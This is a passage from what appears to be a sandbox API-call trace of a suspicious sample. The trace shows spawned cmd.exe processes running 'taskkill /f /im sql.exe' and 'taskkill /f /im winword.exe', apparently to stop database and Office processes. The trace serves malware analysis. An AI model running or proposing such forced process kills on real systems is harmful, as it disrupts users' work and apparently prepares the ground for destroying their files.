(uMode=0x0) returned 0x1 [0060.606] GetProcessHeap () returned 0x720000 [0060.606] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7207f0, Size=0x66) returned 0x7207f0 [0060.606] GetProcessHeap () returned 0x720000 [0060.606] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7207f0) returned 0x66 [0060.606] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.606] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.606] GetProcessHeap () returned 0x720000 [0060.606] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x120) returned 0x7332d0 [0060.607] GetProcessHeap () returned 0x720000 [0060.607] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x238) returned 0x720860 [0060.613] GetProcessHeap () returned 0x720000 [0060.613] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x720860, Size=0x122) returned 0x720860 [0060.613] GetProcessHeap () returned 0x720000 [0060.613] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x720860) returned 0x122 [0060.613] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.613] GetProcessHeap () returned 0x720000 [0060.613] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xe0) returned 0x7333f8 [0060.613] GetProcessHeap () returned 0x720000 [0060.613] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7333f8, Size=0x76) returned 0x7333f8 [0060.613] GetProcessHeap () returned 0x720000 [0060.613] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7333f8) returned 0x76 [0060.614] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.614] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x37edec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37edec) returned 0xffffffff [0060.614] GetLastError () returned 0x2 [0060.614] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x37edec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37edec) returned 0xffffffff [0060.614] GetLastError () returned 0x2 [0060.614] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.614] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x37edec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37edec) returned 0x733478 [0060.614] GetProcessHeap () returned 0x720000 [0060.614] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x14) returned 0x7334b8 [0060.614] FindClose (in: hFindFile=0x733478 | out: hFindFile=0x733478) returned 1 [0060.614] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x37edec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37edec) returned 0xffffffff [0060.614] GetLastError () returned 0x2 [0060.614] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x37edec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37edec) returned 0x733478 [0060.615] GetProcessHeap () returned 0x720000 [0060.615] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7334b8, Size=0x4) returned 0x7334b8 [0060.615] FindClose (in: hFindFile=0x733478 | out: hFindFile=0x733478) returned 1 [0060.615] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.615] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.615] GetConsoleTitleW (in: lpConsoleTitle=0x37f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.615] InitializeProcThreadAttributeList (in: lpAttributeList=0x37f16c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37f234 | out: lpAttributeList=0x37f16c, lpSize=0x37f234) returned 1 [0060.615] UpdateProcThreadAttribute (in: lpAttributeList=0x37f16c, dwFlags=0x0, Attribute=0x60001, lpValue=0x37f22c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37f16c, lpPreviousValue=0x0) returned 1 [0060.615] GetStartupInfoW (in: lpStartupInfo=0x37f128 | out: lpStartupInfo=0x37f128*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.615] GetProcessHeap () returned 0x720000 [0060.615] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x733478 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.615] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.616] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0060.616] GetProcessHeap () returned 0x720000 [0060.616] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x733478 | out: hHeap=0x720000) returned 1 [0060.616] GetProcessHeap () returned 0x720000 [0060.616] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xa) returned 0x72ff10 [0060.616] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0060.617] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sql.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x37f1c8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sql.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37f214 | out: lpCommandLine="taskkill /f /im sql.exe", lpProcessInformation=0x37f214*(hProcess=0x78, hThread=0x74, dwProcessId=0x7c4, dwThreadId=0x808)) returned 1 [0060.970] CloseHandle (hObject=0x74) returned 1 [0060.970] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.970] GetProcessHeap () returned 0x720000 [0060.970] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x735f00 | out: hHeap=0x720000) returned 1 [0060.970] GetEnvironmentStringsW () returned 0x735f00* [0060.971] GetProcessHeap () returned 0x720000 [0060.971] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb36) returned 0x7340c0 [0060.971] FreeEnvironmentStringsW (penv=0x735f00) returned 1 [0060.971] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0070.605] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x37f108 | out: lpExitCode=0x37f108*=0x80) returned 1 [0070.606] CloseHandle (hObject=0x78) returned 1 [0070.606] _vsnwprintf (in: _Buffer=0x37f250, _BufferCount=0x13, _Format="%08X", _ArgList=0x37f114 | out: _Buffer="00000080") returned 8 [0070.606] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0070.607] GetProcessHeap () returned 0x720000 [0070.607] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7340c0 | out: hHeap=0x720000) returned 1 [0070.607] GetEnvironmentStringsW () returned 0x7340c0* [0070.607] GetProcessHeap () returned 0x720000 [0070.607] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb5c) returned 0x7395a8 [0070.607] FreeEnvironmentStringsW (penv=0x7340c0) returned 1 [0070.607] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0070.607] GetProcessHeap () returned 0x720000 [0070.607] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7395a8 | out: hHeap=0x720000) returned 1 [0070.607] GetEnvironmentStringsW () returned 0x7340c0* [0070.607] GetProcessHeap () returned 0x720000 [0070.607] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb5c) returned 0x7395a8 [0070.607] FreeEnvironmentStringsW (penv=0x7340c0) returned 1 [0070.607] GetProcessHeap () returned 0x720000 [0070.607] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x72ff10 | out: hHeap=0x720000) returned 1 [0070.607] DeleteProcThreadAttributeList (in: lpAttributeList=0x37f16c | out: lpAttributeList=0x37f16c) [0070.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.607] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0070.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0070.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0070.608] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0070.609] SetConsoleInputExeNameW () returned 0x1 [0070.609] GetConsoleOutputCP () returned 0x1b5 [0070.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0070.609] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.609] exit (_Code=128) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2732000" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im winword.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0xb48 [0060.266] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fb1c | out: lpSystemTimeAsFileTime=0x25fb1c*(dwLowDateTime=0x93dccb90, dwHighDateTime=0x1d57b18)) [0060.266] GetCurrentProcessId () returned 0xb44 [0060.266] GetCurrentThreadId () returned 0xb48 [0060.266] GetTickCount () returned 0x1149888 [0060.266] QueryPerformanceCounter (in: lpPerformanceCount=0x25fb14 | out: lpPerformanceCount=0x25fb14*=18048750337) returned 1 [0060.267] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.267] __set_app_type (_Type=0x1) [0060.267] __p__fmode () returned 0x74eb31f4 [0060.618] __p__commode () returned 0x74eb31fc [0060.618] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.618] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.618] GetCurrentThreadId () returned 0xb48 [0060.618] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb48) returned 0x60 [0060.618] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.619] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.619] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.619] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25faac | out: phkResult=0x25faac*=0x0) returned 0x2 [0060.619] VirtualQuery (in: lpAddress=0x25fae3, lpBuffer=0x25fa7c, dwLength=0x1c | out: lpBuffer=0x25fa7c*(BaseAddress=0x25f000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.619] VirtualQuery (in: lpAddress=0x160000, lpBuffer=0x25fa7c, dwLength=0x1c | out: lpBuffer=0x25fa7c*(BaseAddress=0x160000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.619] VirtualQuery (in: lpAddress=0x161000, lpBuffer=0x25fa7c, dwLength=0x1c | out: lpBuffer=0x25fa7c*(BaseAddress=0x161000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.619] VirtualQuery (in: lpAddress=0x163000, lpBuffer=0x25fa7c, dwLength=0x1c | out: lpBuffer=0x25fa7c*(BaseAddress=0x163000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.619] VirtualQuery (in: lpAddress=0x260000, lpBuffer=0x25fa7c, dwLength=0x1c | out: lpBuffer=0x25fa7c*(BaseAddress=0x260000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0060.619] GetConsoleOutputCP () returned 0x1b5 [0060.619] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.620] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.620] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.621] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.621] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.621] GetEnvironmentStringsW () returned 0x432040* [0060.621] GetProcessHeap () returned 0x420000 [0060.621] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xaca) returned 0x432b18 [0060.621] FreeEnvironmentStringsW (penv=0x432040) returned 1 [0060.621] GetProcessHeap () returned 0x420000 [0060.621] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4) returned 0x430c78 [0060.621] GetEnvironmentStringsW () returned 0x432040* [0060.621] GetProcessHeap () returned 0x420000 [0060.621] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xaca) returned 0x4335f0 [0060.621] FreeEnvironmentStringsW (penv=0x432040) returned 1 [0060.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25ea1c | out: phkResult=0x25ea1c*=0x68) returned 0x0 [0060.621] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x0, lpData=0x25ea28*=0x0, lpcbData=0x25ea20*=0x1000) returned 0x2 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x1, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x0, lpData=0x25ea28*=0x1, lpcbData=0x25ea20*=0x1000) returned 0x2 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x0, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x40, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x40, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x0, lpData=0x25ea28*=0x40, lpcbData=0x25ea20*=0x1000) returned 0x2 [0060.622] RegCloseKey (hKey=0x68) returned 0x0 [0060.622] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x25ea1c | out: phkResult=0x25ea1c*=0x68) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x0, lpData=0x25ea28*=0x40, lpcbData=0x25ea20*=0x1000) returned 0x2 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x1, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x0, lpData=0x25ea28*=0x1, lpcbData=0x25ea20*=0x1000) returned 0x2 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x0, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x9, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x4, lpData=0x25ea28*=0x9, lpcbData=0x25ea20*=0x4) returned 0x0 [0060.622] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x25ea24, lpData=0x25ea28, lpcbData=0x25ea20*=0x1000 | out: lpType=0x25ea24*=0x0, lpData=0x25ea28*=0x9, lpcbData=0x25ea20*=0x1000) returned 0x2 [0060.622] RegCloseKey (hKey=0x68) returned 0x0 [0060.622] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebad [0060.622] srand (_Seed=0x5d97ebad) [0060.622] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im winword.exe" [0060.622] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im winword.exe" [0060.623] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.623] GetProcessHeap () returned 0x420000 [0060.623] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x210) returned 0x432040 [0060.623] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x432048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.623] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.623] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.623] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.623] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.623] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.623] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.623] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.623] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.623] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.623] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.623] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.623] GetProcessHeap () returned 0x420000 [0060.623] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x432b18 | out: hHeap=0x420000) returned 1 [0060.623] GetEnvironmentStringsW () returned 0x432258* [0060.623] GetProcessHeap () returned 0x420000 [0060.623] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xae2) returned 0x434bb8 [0060.624] FreeEnvironmentStringsW (penv=0x432258) returned 1 [0060.624] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.624] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.624] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.624] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.624] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.624] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.624] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.624] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.624] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.624] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.624] GetProcessHeap () returned 0x420000 [0060.624] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x54) returned 0x4356a8 [0060.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x25f7e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.624] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x25f7e8, lpFilePart=0x25f7e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x25f7e4*="Desktop") returned 0x25 [0060.624] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS 